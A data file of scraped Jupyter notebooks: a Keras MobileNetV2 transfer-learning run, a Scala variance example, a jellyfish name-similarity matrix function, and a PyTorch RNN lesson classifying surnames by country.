384) 0 block_8_expand_BN[0][0] \n__________________________________________________________________________________________________\nblock_8_depthwise (DepthwiseCon (None, 8, 8, 384) 3456 block_8_expand_relu[0][0] \n__________________________________________________________________________________________________\nblock_8_depthwise_BN (BatchNorm (None, 8, 8, 384) 1536 block_8_depthwise[0][0] \n__________________________________________________________________________________________________\nblock_8_depthwise_relu (ReLU) (None, 8, 8, 384) 0 block_8_depthwise_BN[0][0] \n__________________________________________________________________________________________________\nblock_8_project (Conv2D) (None, 8, 8, 64) 24576 block_8_depthwise_relu[0][0] \n__________________________________________________________________________________________________\nblock_8_project_BN (BatchNormal (None, 8, 8, 64) 256 block_8_project[0][0] \n__________________________________________________________________________________________________\nblock_8_add (Add) (None, 8, 8, 64) 0 block_7_add[0][0] \n block_8_project_BN[0][0] \n__________________________________________________________________________________________________\nblock_9_expand (Conv2D) (None, 8, 8, 384) 24576 block_8_add[0][0] \n__________________________________________________________________________________________________\nblock_9_expand_BN (BatchNormali (None, 8, 8, 384) 1536 block_9_expand[0][0] \n__________________________________________________________________________________________________\nblock_9_expand_relu (ReLU) (None, 8, 8, 384) 0 block_9_expand_BN[0][0] \n__________________________________________________________________________________________________\nblock_9_depthwise (DepthwiseCon (None, 8, 8, 384) 3456 block_9_expand_relu[0][0] \n__________________________________________________________________________________________________\nblock_9_depthwise_BN (BatchNorm (None, 8, 8, 384) 1536 block_9_depthwise[0][0] \n__________________________________________________________________________________________________\nblock_9_depthwise_relu (ReLU) (None, 8, 8, 384) 0 block_9_depthwise_BN[0][0] \n__________________________________________________________________________________________________\nblock_9_project (Conv2D) (None, 8, 8, 64) 24576 block_9_depthwise_relu[0][0] \n__________________________________________________________________________________________________\nblock_9_project_BN (BatchNormal (None, 8, 8, 64) 256 block_9_project[0][0] \n__________________________________________________________________________________________________\nblock_9_add (Add) (None, 8, 8, 64) 0 block_8_add[0][0] \n block_9_project_BN[0][0] \n__________________________________________________________________________________________________\nblock_10_expand (Conv2D) (None, 8, 8, 384) 24576 block_9_add[0][0] \n__________________________________________________________________________________________________\nblock_10_expand_BN (BatchNormal (None, 8, 8, 384) 1536 block_10_expand[0][0] \n__________________________________________________________________________________________________\nblock_10_expand_relu (ReLU) (None, 8, 8, 384) 0 block_10_expand_BN[0][0] \n__________________________________________________________________________________________________\nblock_10_depthwise (DepthwiseCo (None, 8, 8, 384) 3456 block_10_expand_relu[0][0] \n__________________________________________________________________________________________________\nblock_10_depthwise_BN (BatchNor (None, 8, 8, 384) 1536 block_10_depthwise[0][0] \n__________________________________________________________________________________________________\nblock_10_depthwise_relu (ReLU) (None, 8, 8, 384) 0 block_10_depthwise_BN[0][0] \n__________________________________________________________________________________________________\nblock_10_project (Conv2D) (None, 8, 8, 96) 36864 block_10_depthwise_relu[0][0] \n__________________________________________________________________________________________________\nblock_10_project_BN (BatchNorma (None, 8, 8, 96) 384 block_10_project[0][0] \n__________________________________________________________________________________________________\nblock_11_expand (Conv2D) (None, 8, 8, 576) 55296 block_10_project_BN[0][0] \n__________________________________________________________________________________________________\nblock_11_expand_BN (BatchNormal (None, 8, 8, 576) 2304 block_11_expand[0][0] \n__________________________________________________________________________________________________\nblock_11_expand_relu (ReLU) (None, 8, 8, 576) 0 block_11_expand_BN[0][0] \n__________________________________________________________________________________________________\nblock_11_depthwise (DepthwiseCo (None, 8, 8, 576) 5184 block_11_expand_relu[0][0] \n__________________________________________________________________________________________________\nblock_11_depthwise_BN (BatchNor (None, 8, 8, 576) 2304 block_11_depthwise[0][0] \n__________________________________________________________________________________________________\nblock_11_depthwise_relu (ReLU) (None, 8, 8, 576) 0 block_11_depthwise_BN[0][0] \n__________________________________________________________________________________________________\nblock_11_project (Conv2D) (None, 8, 8, 96) 55296 block_11_depthwise_relu[0][0] \n__________________________________________________________________________________________________\nblock_11_project_BN (BatchNorma (None, 8, 8, 96) 384 block_11_project[0][0] \n__________________________________________________________________________________________________\nblock_11_add (Add) (None, 8, 8, 96) 0 block_10_project_BN[0][0] \n block_11_project_BN[0][0] \n__________________________________________________________________________________________________\nblock_12_expand (Conv2D) (None, 8, 8, 576) 55296 block_11_add[0][0] \n__________________________________________________________________________________________________\nblock_12_expand_BN (BatchNormal (None, 8, 8, 576) 2304 block_12_expand[0][0] \n__________________________________________________________________________________________________\nblock_12_expand_relu (ReLU) (None, 8, 8, 576) 0 block_12_expand_BN[0][0] \n__________________________________________________________________________________________________\nblock_12_depthwise (DepthwiseCo (None, 8, 8, 576) 5184 block_12_expand_relu[0][0] \n__________________________________________________________________________________________________\nblock_12_depthwise_BN (BatchNor (None, 8, 8, 576) 2304 block_12_depthwise[0][0] \n__________________________________________________________________________________________________\nblock_12_depthwise_relu (ReLU) (None, 8, 8, 576) 0 block_12_depthwise_BN[0][0] \n__________________________________________________________________________________________________\nblock_12_project (Conv2D) (None, 8, 8, 96) 55296 block_12_depthwise_relu[0][0] \n__________________________________________________________________________________________________\nblock_12_project_BN (BatchNorma (None, 8, 8, 96) 384 block_12_project[0][0] \n__________________________________________________________________________________________________\nblock_12_add (Add) (None, 8, 8, 96) 0 block_11_add[0][0] \n block_12_project_BN[0][0] \n__________________________________________________________________________________________________\nblock_13_expand (Conv2D) (None, 8, 8, 576) 55296 block_12_add[0][0] \n__________________________________________________________________________________________________\nblock_13_expand_BN (BatchNormal (None, 8, 8, 576) 2304 block_13_expand[0][0] \n__________________________________________________________________________________________________\nblock_13_expand_relu (ReLU) (None, 8, 8, 576) 0 block_13_expand_BN[0][0] \n__________________________________________________________________________________________________\nblock_13_pad (ZeroPadding2D) (None, 9, 9, 576) 0 block_13_expand_relu[0][0] \n__________________________________________________________________________________________________\nblock_13_depthwise (DepthwiseCo (None, 4, 4, 576) 5184 block_13_pad[0][0] \n__________________________________________________________________________________________________\nblock_13_depthwise_BN (BatchNor (None, 4, 4, 576) 2304 block_13_depthwise[0][0] \n__________________________________________________________________________________________________\nblock_13_depthwise_relu (ReLU) (None, 4, 4, 576) 0 block_13_depthwise_BN[0][0] \n__________________________________________________________________________________________________\nblock_13_project (Conv2D) (None, 4, 4, 160) 92160 block_13_depthwise_relu[0][0] \n__________________________________________________________________________________________________\nblock_13_project_BN (BatchNorma (None, 4, 4, 160) 640 block_13_project[0][0] \n__________________________________________________________________________________________________\nblock_14_expand (Conv2D) (None, 4, 4, 960) 153600 block_13_project_BN[0][0] \n__________________________________________________________________________________________________\nblock_14_expand_BN (BatchNormal (None, 4, 4, 960) 3840 block_14_expand[0][0] \n__________________________________________________________________________________________________\nblock_14_expand_relu (ReLU) (None, 4, 4, 960) 0 block_14_expand_BN[0][0] \n__________________________________________________________________________________________________\nblock_14_depthwise (DepthwiseCo (None, 4, 4, 960) 8640 block_14_expand_relu[0][0] \n__________________________________________________________________________________________________\nblock_14_depthwise_BN (BatchNor (None, 4, 4, 960) 3840 block_14_depthwise[0][0] \n__________________________________________________________________________________________________\nblock_14_depthwise_relu (ReLU) (None, 4, 4, 960) 0 block_14_depthwise_BN[0][0] \n__________________________________________________________________________________________________\nblock_14_project (Conv2D) (None, 4, 4, 160) 153600 block_14_depthwise_relu[0][0] \n__________________________________________________________________________________________________\nblock_14_project_BN (BatchNorma (None, 4, 4, 160) 640 block_14_project[0][0] \n__________________________________________________________________________________________________\nblock_14_add (Add) (None, 4, 4, 160) 0 block_13_project_BN[0][0] \n block_14_project_BN[0][0] \n__________________________________________________________________________________________________\nblock_15_expand (Conv2D) (None, 4, 4, 960) 153600 block_14_add[0][0] \n__________________________________________________________________________________________________\nblock_15_expand_BN (BatchNormal (None, 4, 4, 960) 3840 block_15_expand[0][0] \n__________________________________________________________________________________________________\nblock_15_expand_relu (ReLU) (None, 4, 4, 960) 0 block_15_expand_BN[0][0] \n__________________________________________________________________________________________________\nblock_15_depthwise (DepthwiseCo (None, 4, 4, 960) 8640 block_15_expand_relu[0][0] \n__________________________________________________________________________________________________\nblock_15_depthwise_BN (BatchNor (None, 4, 4, 960) 3840 block_15_depthwise[0][0] \n__________________________________________________________________________________________________\nblock_15_depthwise_relu (ReLU) (None, 4, 4, 960) 0 block_15_depthwise_BN[0][0] \n__________________________________________________________________________________________________\nblock_15_project (Conv2D) (None, 4, 4, 160) 153600 block_15_depthwise_relu[0][0] \n__________________________________________________________________________________________________\nblock_15_project_BN (BatchNorma (None, 4, 4, 160) 640 block_15_project[0][0] \n__________________________________________________________________________________________________\nblock_15_add (Add) (None, 4, 4, 160) 0 block_14_add[0][0] \n block_15_project_BN[0][0] \n__________________________________________________________________________________________________\nblock_16_expand (Conv2D) (None, 4, 4, 960) 153600 block_15_add[0][0] \n__________________________________________________________________________________________________\nblock_16_expand_BN (BatchNormal (None, 4, 4, 960) 3840 block_16_expand[0][0] \n__________________________________________________________________________________________________\nblock_16_expand_relu (ReLU) (None, 4, 4, 960) 0 block_16_expand_BN[0][0] \n__________________________________________________________________________________________________\nblock_16_depthwise (DepthwiseCo (None, 4, 4, 960) 8640 block_16_expand_relu[0][0] \n__________________________________________________________________________________________________\nblock_16_depthwise_BN (BatchNor (None, 4, 4, 960) 3840 block_16_depthwise[0][0] \n__________________________________________________________________________________________________\nblock_16_depthwise_relu (ReLU) (None, 4, 4, 960) 0 block_16_depthwise_BN[0][0] \n__________________________________________________________________________________________________\nblock_16_project (Conv2D) (None, 4, 4, 320) 307200 block_16_depthwise_relu[0][0] \n__________________________________________________________________________________________________\nblock_16_project_BN (BatchNorma (None, 4, 4, 320) 1280 block_16_project[0][0] \n__________________________________________________________________________________________________\nConv_1 (Conv2D) (None, 4, 4, 1280) 409600 block_16_project_BN[0][0] \n__________________________________________________________________________________________________\nConv_1_bn (BatchNormalization) (None, 4, 4, 1280) 5120 Conv_1[0][0] \n__________________________________________________________________________________________________\nout_relu (ReLU) (None, 4, 4, 1280) 0 Conv_1_bn[0][0] \n==================================================================================================\nTotal params: 2,257,984\nTrainable params: 0\nNon-trainable params: 2,257,984\n__________________________________________________________________________________________________\n"
],
[
"global_average_layer = tf.keras.layers.GlobalAveragePooling2D()\nfeature_batch_average = global_average_layer(feature_batch)\nprint(feature_batch_average.shape)",
"(32, 1280)\n"
],
[
"prediction_layer = tf.keras.layers.Dense(10, activation='softmax')\nprediction_batch = prediction_layer(feature_batch_average)\nprint(prediction_batch.shape)",
"(32, 10)\n"
],
[
"# prediction_model = tf.keras.models.Sequential()\n# prediction_model.add(tf.keras.layers.Flatten())\n# prediction_model.add(tf.keras.layers.Dense(64, activation='relu'))\n# prediction_model.add(tf.keras.layers.Dense(10, activation='softmax'))",
"_____no_output_____"
],
[
"model = tf.keras.Sequential([\n base_model,\n global_average_layer,\n prediction_layer\n])",
"_____no_output_____"
],
[
"model.summary()",
"Model: \"sequential\"\n_________________________________________________________________\nLayer (type) Output Shape Param # \n=================================================================\nmobilenetv2_1.00_128 (Model) (None, 4, 4, 1280) 2257984 \n_________________________________________________________________\nglobal_average_pooling2d (Gl (None, 1280) 0 \n_________________________________________________________________\ndense (Dense) (None, 10) 12810 \n=================================================================\nTotal params: 2,270,794\nTrainable params: 12,810\nNon-trainable params: 2,257,984\n_________________________________________________________________\n"
],
[
"model.compile(optimizer='adam',\n loss='sparse_categorical_crossentropy',\n metrics=['accuracy'])",
"_____no_output_____"
],
[
"model.summary()",
"Model: \"sequential\"\n_________________________________________________________________\nLayer (type) Output Shape Param # \n=================================================================\nmobilenetv2_1.00_128 (Model) (None, 4, 4, 1280) 2257984 \n_________________________________________________________________\nglobal_average_pooling2d (Gl (None, 1280) 0 \n_________________________________________________________________\ndense (Dense) (None, 10) 12810 \n=================================================================\nTotal params: 2,270,794\nTrainable params: 12,810\nNon-trainable params: 2,257,984\n_________________________________________________________________\n"
],
[
"num_train, num_val, num_test = (\n metadata.splits['train'].num_examples*weight/10\n for weight in SPLIT_WEIGHTS\n)",
"_____no_output_____"
],
[
"initial_epochs = 10\nsteps_per_epoch = round(num_train)//BATCH_SIZE\nvalidation_steps = 20\n\nloss0,accuracy0 = model.evaluate(validation_batches, steps = validation_steps)",
"20/20 [==============================] - 9s 430ms/step - loss: 2.8450 - accuracy: 0.0891\n"
],
[
"print(\"initial loss: {:.2f}\".format(loss0))\nprint(\"initial accuracy: {:.2f}\".format(accuracy0))",
"initial loss: 2.85\ninitial accuracy: 0.09\n"
],
[
"history = model.fit(train_batches,\n epochs=initial_epochs,\n validation_data=validation_batches)",
"Epoch 1/10\n1250/1250 [==============================] - 906s 724ms/step - loss: 0.7841 - accuracy: 0.7360 - val_loss: 3.3938 - val_accuracy: 0.0956\nEpoch 2/10\n1250/1250 [==============================] - 899s 719ms/step - loss: 0.6249 - accuracy: 0.7876 - val_loss: 3.1788 - val_accuracy: 0.1108\nEpoch 3/10\n1250/1250 [==============================] - 895s 716ms/step - loss: 0.5995 - accuracy: 0.7943 - val_loss: 3.1835 - val_accuracy: 0.1248\nEpoch 4/10\n1250/1250 [==============================] - 924s 740ms/step - loss: 0.5877 - accuracy: 0.7996 - val_loss: 3.6165 - val_accuracy: 0.1230\nEpoch 5/10\n1250/1250 [==============================] - 926s 741ms/step - loss: 0.5757 - accuracy: 0.8047 - val_loss: 3.8792 - val_accuracy: 0.1148\nEpoch 6/10\n1250/1250 [==============================] - 927s 741ms/step - loss: 0.5783 - accuracy: 0.8051 - val_loss: 4.1246 - val_accuracy: 0.1078\nEpoch 7/10\n1250/1250 [==============================] - 930s 744ms/step - loss: 0.5686 - accuracy: 0.8062 - val_loss: 4.2597 - val_accuracy: 0.1094\nEpoch 8/10\n1250/1250 [==============================] - 950s 760ms/step - loss: 0.5651 - accuracy: 0.8087 - val_loss: 3.4582 - val_accuracy: 0.1250\nEpoch 9/10\n1250/1250 [==============================] - 936s 749ms/step - loss: 0.5715 - accuracy: 0.8058 - val_loss: 4.0509 - val_accuracy: 0.1094\nEpoch 10/10\n1250/1250 [==============================] - 939s 751ms/step - loss: 0.5623 - accuracy: 0.8083 - val_loss: 3.8432 - val_accuracy: 0.1246\n"
],
[
"acc = history.history['accuracy']\nval_acc = history.history['val_accuracy']\n\nloss = history.history['loss']\nval_loss = history.history['val_loss']\n\nplt.figure(figsize=(8, 8))\nplt.subplot(2, 1, 1)\nplt.plot(acc, label='Training Accuracy')\nplt.plot(val_acc, label='Validation Accuracy')\nplt.legend(loc='lower right')\nplt.ylabel('Accuracy')\nplt.ylim([min(plt.ylim()),1])\nplt.title('Training and Validation Accuracy')\n\nplt.subplot(2, 1, 2)\nplt.plot(loss, label='Training Loss')\nplt.plot(val_loss, label='Validation Loss')\nplt.legend(loc='upper right')\nplt.ylabel('Cross Entropy')\nplt.ylim([0,1.0])\nplt.title('Training and Validation Loss')\nplt.xlabel('epoch')\nplt.show()",
"_____no_output_____"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb039fb4195788c7835f4b15aee3729e082b2368 | 5,997 | ipynb | Jupyter Notebook | scala/Covariance-and-contravariance.ipynb | ashishpatel26/learning | b9e9472a70841061d2e755659872c8b093124f89 | [
"MIT"
] | 54 | 2017-09-10T17:28:21.000Z | 2021-12-17T14:55:04.000Z | scala/Covariance-and-contravariance.ipynb | parvathirajan/learning | bb112015d4513414bf86c7392c12b13f8d0fdd21 | [
"MIT"
] | 1 | 2019-07-04T21:57:14.000Z | 2019-07-04T21:57:14.000Z | scala/Covariance-and-contravariance.ipynb | parvathirajan/learning | bb112015d4513414bf86c7392c12b13f8d0fdd21 | [
"MIT"
] | 36 | 2017-11-13T16:54:58.000Z | 2022-02-07T11:20:20.000Z | 19.857616 | 119 | 0.50025 | [
[
[
"### Covariance",
"_____no_output_____"
]
],
[
[
"sealed trait MyOption[A]\ncase class MySome[A](get: A) extends MyOption[A]\ncase class MyNone[A]() extends MyOption[A]",
"_____no_output_____"
],
[
"def f(a: MyOption[Any]) = a",
"_____no_output_____"
],
[
"f(MySome[Any](1))",
"_____no_output_____"
],
[
"f(MySome[Int](1))",
"_____no_output_____"
],
[
"sealed trait MyOption2[+A]\ncase class MySome2[A](get: A) extends MyOption2[A]\ncase class MyNone2[A]() extends MyOption2[A]",
"_____no_output_____"
],
[
"def f(a: MyOption2[Any]) = a",
"_____no_output_____"
],
[
"f(MySome2[Int](1))",
"_____no_output_____"
]
],
[
[
"### Contravariance",
"_____no_output_____"
]
],
[
[
"def toS(a: Any) = a.toString",
"_____no_output_____"
],
[
"toS(List(1,2,3))",
"_____no_output_____"
],
[
"def f(a: String => String, s: String) = a(s)",
"_____no_output_____"
],
[
"// This works even though f is String => String\nf(toS, \"abc\")",
"_____no_output_____"
]
],
[
[
"To understand why take a look at [Function1](http://scala-lang.org/files/archive/api/2.11.8/#scala.Function1):\n```\ntrait Function1[-T1, +R] extends AnyRef\n```\n\nwhich is contravariant in input.",
"_____no_output_____"
],
[
"#### Acknowledgement\nThanks to [@deaktator](https://github.com/deaktator) for explaining these to me",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown"
] | [
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown",
"markdown"
]
] |
cb03b5ccccb32096aef98353af88ae854c56f645 | 3,596 | ipynb | Jupyter Notebook | Analyse/Recon.ipynb | Ammeister/Dachstein_RA | cb16a2d51bd09c2686a6d65950440947ffa68fbe | [
"MIT"
] | null | null | null | Analyse/Recon.ipynb | Ammeister/Dachstein_RA | cb16a2d51bd09c2686a6d65950440947ffa68fbe | [
"MIT"
] | null | null | null | Analyse/Recon.ipynb | Ammeister/Dachstein_RA | cb16a2d51bd09c2686a6d65950440947ffa68fbe | [
"MIT"
] | null | null | null | 34.576923 | 166 | 0.496941 | [
[
[
"import pandas as pd\nimport numpy as np\nimport jellyfish",
"_____no_output_____"
],
[
"def SimiDistMatrix(Input, Output, colindex, algo):\n \"\"\"\n SimiDistMatrix nécessite les modules pandas, numpy et jellyfish.\n SimiDistMatrix est une fonction qui compare une colonne de string avec elle même crée une matrice de similarité ou de distance selon l'algorythme choisi.\n Input : str, chemin relatif du fichier d'entrée.\n Output : str, chemin relatif du fichier de sortie.\n colindex : int, index de la colonne à tester.\n algo : str, algorythme à tester (levenshtein_distance, damerau_levenshtein_distance, hamming_distance, jaro_similarity, jaro_winkler_similarity)\n \"\"\"\n with open (Input, 'r', encoding='utf-8') as file :\n df = pd.read_csv(file)\n df = df.fillna('')\n df['tocompare'] = df['nom'].dropna() + df['prenom'].dropna()\n\n\n LsList = []\n\n for row in df.itertuples():\n ArrayList = []\n\n #print(row)\n for col in df.columns[colindex:]:\n value1 = getattr(row, col)\n for row in df.itertuples():\n for col in df.columns[colindex:]:\n value2 = getattr(row, col)\n \n if algo == 'levenshtein_distance' :\n similarity = jellyfish.levenshtein_distance(value1, value2)\n \n if algo == 'damerau_levenshtein_distance' :\n similarity = jellyfish.damerau_levenshtein_distance(value1, value2)\n \n if algo == 'hamming_distance' :\n similarity = jellyfish.hamming_distance(value1, value2)\n \n if algo == 'jaro_similarity' :\n similarity = jellyfish.jaro_similarity(value1, value2)\n \n if algo == 'jaro_winkler_similarity' :\n similarity = jellyfish.jaro_winkler_similarity(value1, value2)\n \n ArrayList.append(similarity)\n LsList.append(ArrayList)\n\n df2 = pd.DataFrame(LsList, columns = df['id'].tolist(), index = df['id'].tolist())\n \n sortie = Output + algo + '.csv'\n \n df2.to_csv(sortie)",
"_____no_output_____"
],
[
"SimiDistMatrix('./Data/OccConst.csv', './Data/LargeData/', 17, 'jaro_winkler_similarity')",
"_____no_output_____"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code"
]
] |
cb03b829ac9d6fb47c631aeb5b41d7e5eed02ea1 | 248,276 | ipynb | Jupyter Notebook | lessons/lesson13_RNN_classification.ipynb | elcolie/practice-pytorch | d83331e9ba3c8ac64a7ca4f76a2883e66b5c170c | [
"MIT"
] | null | null | null | lessons/lesson13_RNN_classification.ipynb | elcolie/practice-pytorch | d83331e9ba3c8ac64a7ca4f76a2883e66b5c170c | [
"MIT"
] | null | null | null | lessons/lesson13_RNN_classification.ipynb | elcolie/practice-pytorch | d83331e9ba3c8ac64a7ca4f76a2883e66b5c170c | [
"MIT"
] | null | null | null | 202.839869 | 157,036 | 0.901199 | [
[
[
"# README\nDo not blindly copy and paste. The parameter is hard-fixed with the `dataset`.<br>\nFor example: `SEQUENCE_LENGTH`",
"_____no_output_____"
]
],
[
[
"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport pandas as pd\nfrom torch.utils.data import Dataset, DataLoader\nfrom tqdm import tqdm_notebook as tqdm\nfrom sampler import ImbalancedDatasetSampler\n\ntorch.manual_seed(1249583)\n\n# See the details in `Dataset` section\nSEQUENCE_LENGTH = 19\nCOUNTRY_LENGTH = 18\n",
"_____no_output_____"
]
],
[
[
"# Data Preparation",
"_____no_output_____"
],
[
"<img src='lesson13_data.png'>",
"_____no_output_____"
]
],
[
[
"def str2ascii_arr(name):\n \"\"\"\n 0-255\n \"\"\"\n arr = [ord(c) for c in name]\n return arr, len(arr)",
"_____no_output_____"
],
[
"class RNNClassifier(nn.Module):\n def __init__(self, input_size=256, hidden_size=256, output_size=18, n_layers=1):\n \"\"\"\n Because word embedding is working with ascii. It has to use `input_size=256, hidden_size=256`\n \"\"\"\n super().__init__()\n self.hidden_size = hidden_size\n self.n_layers = n_layers\n \n # input_size 256, hidden_size 256.\n # https://python-reference.readthedocs.io/en/latest/docs/str/ASCII.html\n # Embedding should be (128, 300) not (256, 256). However I am not going to improve lesson.\n # I am going to improve an Exercise 13\n self.embedding = nn.Embedding(input_size, hidden_size)\n self.gru = nn.GRU(hidden_size, hidden_size, n_layers)\n self.fc = nn.Linear(hidden_size, output_size)\n \n def forward(self, input):\n \"\"\"\n Do not remove `print`. Leave it be a historical footprint for I myself in the future\n \"\"\"\n \n # Sung Kim run this all at once (over the whole input sequence)\n # input = B x S . size(0) = B\n batch_size = input.size(0)\n \n # input: B x S -- (transpose) --> S x B\n input = input.t()\n \n # Embedding S x B -> S x B x I (embedding size)\n # print(f\" input size: {input.size()}\")\n embedded = self.embedding(input)\n embedded = embedded.clone().detach() # Make new tensor because of `EmbeddingGrad`\n # print(f\" embeddding size: {embedded.size()}\")\n \n # Make a hidden\n hidden = self._init_hidden(batch_size)\n output, hidden = self.gru(embedded, hidden)\n # print(f\" gru hidden output: {hidden.size()}\")\n \n # Use last layer output as FC's input\n # No need to unpack, since we are going to use hidden\n fc_output = self.fc(hidden)\n # print(f\" fc output: {fc_output.size()}\")\n return fc_output\n \n def _init_hidden(self, batch_size):\n hidden = torch.zeros(self.n_layers, batch_size, self.hidden_size)\n return hidden.clone().detach()",
"_____no_output_____"
],
[
"# in torch.Size([1, 6]) 'adylov'\n# out torch.Size([1, 1, 18]) 18 countries",
"_____no_output_____"
]
],
[
[
"# Zero padding",
"_____no_output_____"
],
[
"<img src='zero_padding.png'>",
"_____no_output_____"
]
],
[
[
"def pad_sequences(vectorized_seqs, seq_lengths):\n \"\"\"\n Let the `SEQUENCE_LENGTH` is 19. According to the dataset\n \"\"\"\n seq_tensor = torch.zeros((len(vectorized_seqs), SEQUENCE_LENGTH), dtype=torch.long)\n for idx, (seq, seq_len) in enumerate(zip(vectorized_seqs, seq_lengths)):\n seq_tensor[idx, :seq_len] = torch.tensor(seq, dtype=torch.long)\n return seq_tensor",
"_____no_output_____"
],
[
"def make_variables(names):\n names = [i.lower() for i in names] # Let them be a lowercase()\n sequence_and_length = [str2ascii_arr(name) for name in names]\n vectorized_seqs = [sl[0] for sl in sequence_and_length]\n seq_lengths = torch.tensor([sl[1] for sl in sequence_and_length])\n return pad_sequences(vectorized_seqs, seq_lengths)",
"_____no_output_____"
],
[
"make_variables(['az', 'ab '])",
"_____no_output_____"
],
[
"classifier = RNNClassifier()\narr, _ = str2ascii_arr('adylov')\ninp = torch.tensor([arr], dtype=torch.long)\nout = classifier(inp)\nprint(f\"\\nin: {inp.size()}, \\nout: {out.size()}\")",
"\nin: torch.Size([1, 6]), \nout: torch.Size([1, 1, 18])\n"
],
[
"names = ['adylov', 'solan', 'hard', 'san']\nclassifier = RNNClassifier()\ninputs = make_variables(names)\nout = classifier(inputs)\nprint(f\"\\nbatch in: {inputs.size()}, \\nbatch out: {out.size()}\")",
"\nbatch in: torch.Size([4, 19]), \nbatch out: torch.Size([1, 4, 18])\n"
]
],
[
[
"# Utilities",
"_____no_output_____"
]
],
[
[
"import itertools\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn.metrics import confusion_matrix\n\ndef plot_confusion_matrix(cm, classes,\n normalize=False,\n title='Confusion matrix',\n cmap=plt.cm.Blues):\n \"\"\"\n This function prints and plots the confusion matrix.\n Normalization can be applied by setting `normalize=True`.\n \"\"\"\n print(cm)\n plt.figure(figsize=(10, 10))\n plt.imshow(cm, interpolation='nearest', cmap=cmap)\n plt.title(title)\n plt.colorbar()\n tick_marks = np.arange(len(classes))\n plt.xticks(tick_marks, classes, rotation=45)\n plt.yticks(tick_marks, classes)\n\n fmt = '.2f' if normalize else 'd'\n thresh = cm.max() / 2.\n for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):\n plt.text(j, i, format(cm[i, j], fmt),\n horizontalalignment=\"center\",\n color=\"white\" if cm[i, j] > thresh else \"black\")\n\n plt.ylabel('True label')\n plt.xlabel('Predicted label')\n plt.tight_layout()\n\ndef train(model, device, train_loader, optimizer, epoch, criterion):\n \"\"\"\n This function has one line different from the ordinary `train()` function\n It has `make_variables()` to convert tuple of names to be a tensor\n \"\"\"\n model.train()\n for batch_idx, (data, target) in enumerate(train_loader):\n\n # Do not forget to convert the tuple of string to a tensor\n data = make_variables(data)\n \n data, target = data.to(device), target.to(device)\n optimizer.zero_grad()\n output = model(data)\n tmp = output.view(-1, COUNTRY_LENGTH)\n loss = criterion(tmp, target)\n loss.backward()\n optimizer.step()\n if batch_idx % 1000 == 0:\n print('Train Epoch: {} [{}/{} ({:.0f}%)]\\tLoss: {:.6f}'.format(\n epoch, batch_idx * len(data), len(train_loader.dataset),\n 100. * batch_idx / len(train_loader), loss.item()))\n\ndef test(model, device, test_loader, criterion):\n model.eval()\n test_loss = 0\n correct = 0\n y_test = []\n y_pred = []\n with torch.no_grad():\n for data, target in tqdm(test_loader):\n data = make_variables(data)\n data, target = data.to(device), target.to(device)\n output = model(data)\n tmp = output.view(-1, COUNTRY_LENGTH)\n \n test_loss += criterion(tmp, target).item() # sum up batch loss\n pred = tmp.max(1, keepdim=True)[1] # get the index of the max log-probability\n\n pred_tmp = pred.view(-1)\n pred_list = pred_tmp.tolist()\n target_list = target.tolist()\n \n y_test += target_list\n y_pred += pred_list\n correct += pred.eq(target.view_as(pred)).sum().item()\n\n test_loss /= len(test_loader.dataset)\n\n print('\\nTest set: Average loss: {:.4f}, Accuracy: {}/{} ({:.0f}%)\\n'.format(\n test_loss, correct, len(test_loader.dataset),\n 100. * correct / len(test_loader.dataset)))\n \n # Confusion matrix\n confusion_mtx = confusion_matrix(y_test, y_pred)\n plot_confusion_matrix(confusion_mtx, classes=countries, normalize=True,\n title='Confusion matrix')\n",
"_____no_output_____"
]
],
[
[
"# Dataset",
"_____no_output_____"
]
],
[
[
"trainset = pd.read_csv('names_train.csv', header=None)\ntestset = pd.read_csv('names_test.csv', header=None) ",
"_____no_output_____"
],
[
"headers = ['name', 'country']\ntrainset.columns = headers\ntestset.columns = headers",
"_____no_output_____"
],
[
"countries = sorted(list(trainset.country.drop_duplicates()))",
"_____no_output_____"
],
[
"country_counting = trainset.country.value_counts()",
"_____no_output_____"
],
[
"country_counting",
"_____no_output_____"
],
[
"counting_df = pd.DataFrame(country_counting)",
"_____no_output_____"
],
[
"counting_df.loc['Russian']['country']",
"_____no_output_____"
],
[
"counting_df['ratio'] = (counting_df.country.sum())/counting_df['country']",
"_____no_output_____"
]
],
[
[
"Use at `CrossEntropy` weights",
"_____no_output_____"
]
],
[
[
"counting_df.country.sum()",
"_____no_output_____"
],
[
"counting_df",
"_____no_output_____"
],
[
"test_counting = testset.country.value_counts()\ntest_counting",
"_____no_output_____"
],
[
"# Majority of dataset is `Russian`\ntrainset.country.value_counts().plot.pie()",
"_____no_output_____"
],
[
"# So as trainset\ntestset.country.value_counts().plot.pie()",
"_____no_output_____"
],
[
"trainset.iloc[0]['country']",
"_____no_output_____"
]
],
[
[
"# Find the longest name in the dataset",
"_____no_output_____"
]
],
[
[
"result = pd.concat([trainset, testset])",
"_____no_output_____"
],
[
"result['name_length'] = result.name.apply(lambda x: len(x))",
"_____no_output_____"
]
],
[
[
"## Longest name is 19 chars\n19 is the `sequence_length`",
"_____no_output_____"
]
],
[
[
"result['name_length'].max(), result['name_length'].idxmax()",
"_____no_output_____"
],
[
"result.iloc[7925]",
"_____no_output_____"
],
[
"class NameDataSet(Dataset):\n def __init__(self, filename='names_train.csv'):\n trainset = pd.read_csv(filename, header=None)\n trainset.columns = ['name', 'country']\n countries = sorted(list(trainset.country.drop_duplicates()))\n\n self.trainset = trainset\n self.countries = countries\n self.len = len(trainset) \n\n def __getitem__(self, index):\n country = self.trainset.iloc[index]['country']\n return self.trainset.iloc[index]['name'], self.countries.index(country)\n\n def __len__(self):\n return self.len\n ",
"_____no_output_____"
],
[
"train_dataset = NameDataSet()\ntest_dataset = NameDataSet('names_test.csv')",
"_____no_output_____"
],
[
"train_dataset.countries.index('Czech')",
"_____no_output_____"
],
[
